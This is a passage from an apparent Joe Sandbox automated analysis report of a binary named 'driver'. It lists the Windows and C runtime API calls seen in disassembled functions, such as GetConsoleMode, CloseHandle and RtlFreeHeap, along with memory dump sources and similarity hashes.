1016->1022 1023 7ff6a29cd26c-7ff6a29cd27b 1016->1023 1018->1009 1019->964 1019->1018 1024 7ff6a29cd128-7ff6a29cd13f call 7ff6a29d3a58 1020->1024 1021->990 1022->1015 1023->1022 1029 7ff6a29cd141-7ff6a29cd14d 1024->1029 1030 7ff6a29cd177-7ff6a29cd17d GetLastError 1024->1030 1031 7ff6a29cd14f-7ff6a29cd161 call 7ff6a29d3a58 1029->1031 1032 7ff6a29cd16c-7ff6a29cd173 1029->1032 1030->1021 1031->1030 1036 7ff6a29cd163-7ff6a29cd16a 1031->1036 1032->1021 1034 7ff6a29cd175 1032->1034 1034->1024 1036->1032
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD0EC
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD177
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction ID: 522a9567aabdbeb78e2da34d8e5744d7ad4773fd4d8039c6315a57bc8951ac28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6291D332F5A65289F754DF6694402BD2BA0BB44F8CF144139DE0E97B8ACEB8F452E710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                • Instruction ID: af24e6ae04aa384eaf642277f0b4bd08a85d39d302fba75e2ac716e15e3b23bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641B522E597828BF3149B22951037963A0FB94F98F109335EA5C53AD3DFBCB4E09700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                                • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction ID: c148c9aa73422208d980bb07c7718939a48255daa0e182e7742f38094fa45c89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C314B24E8B1435AFA54AB2794253B916919F85F8CF440438E54DCB2D3DEECF805A250
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                • Instruction ID: d66be68a4f72fe4fcd21954ca78fa652fc8ce3084658814659761d7688d41448
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82D09214B8A7465BFB183B725DA907812966F5DF49F14143CC80B86393EDADB849B300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction ID: 11bafb8702b7b25db2b9093d4a80d2cc83c0ff6dfd8ab14d6a58533e492f9852
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA51C661B8F2514EEA289E67940067E6691AF44FACF144734DD6D87BCBCFBCF401A600
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction ID: adb64a7c1b0ee9e0a91fff866cf25c4ab2f9d1114ce483fa9e1f659952c6bfb3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35112361B09B8185EA108B27E814169A761FB45FF8F644331EE7D8B7EACFBCE0119700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                • Instruction ID: 59287f97f8006a3c6519f32283c540bd7f78ad61a05abe0c8558e97b0ce9b0b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E08C50F8B64247FF0C6BB3A8661B912A16F88F88F454034DC1DC22A3EEAC7885B300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC36
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A29CAA45,?,?,00000000,00007FF6A29CAAFA), ref: 00007FF6A29CAC40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction ID: 6cbaf254e8af50c7a1a333f7f4cc45dd2f85b16513f45232177e9ebc722cf1ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9321C921F9E64246FAD45B63D4943B912926F84FA8F084239D91EC73C3DEECF4456301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction ID: 8d5985ee5f3c6c11994a77b79460bb9d5ea420ea99a8f76aaea311e4cf2306d2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D41C232A4A2018BEA34DB17A55027D77A5EB55F98F140131EA8EC3792CFADF402EB51
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                                • Instruction ID: d8e74b0e728e09b6aa21c61caea39c79d4c6d026dae64044f200c5f44ffd8338
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3221A321B8A65289FA149A1369043FA9651BF49FCCF8C5430EE4D87787CEBDE042A601
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction ID: 0ca300ebdfacd212c790755f9d8e081d95734f5266d70d90ba69dbed48f93e67
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8531AE22A5A64289F7515B57885137C36A1AF40F9CF520135E96D833D3CFFCF851A721
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                                • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                • Instruction ID: b59d241ff1f0d1c1bccc42cf52132d3bdac714f3136121757b7cb84a82bc4548
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02216B32A466828EFB248F65C4443FC33A0EB08F1CF441635D62D86AD6DFB8E584DB50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction ID: b19c2d8bec1afd658c8699d7ed7b117ee2b773e9c62324a95e810f2c97f1e2d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD119322A5E6418AFA649F13D4102BEA260EF45F88F444031EB4CE7A97DFBCF400A700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction ID: 829dfdb0357ff83dc32e141c7a0253004ebbd566023a4ded59427df2187ccbc8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3821C97265964187DB658F19E44037977E1FB84F98F144234EA9DC76DADF7CE400AB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
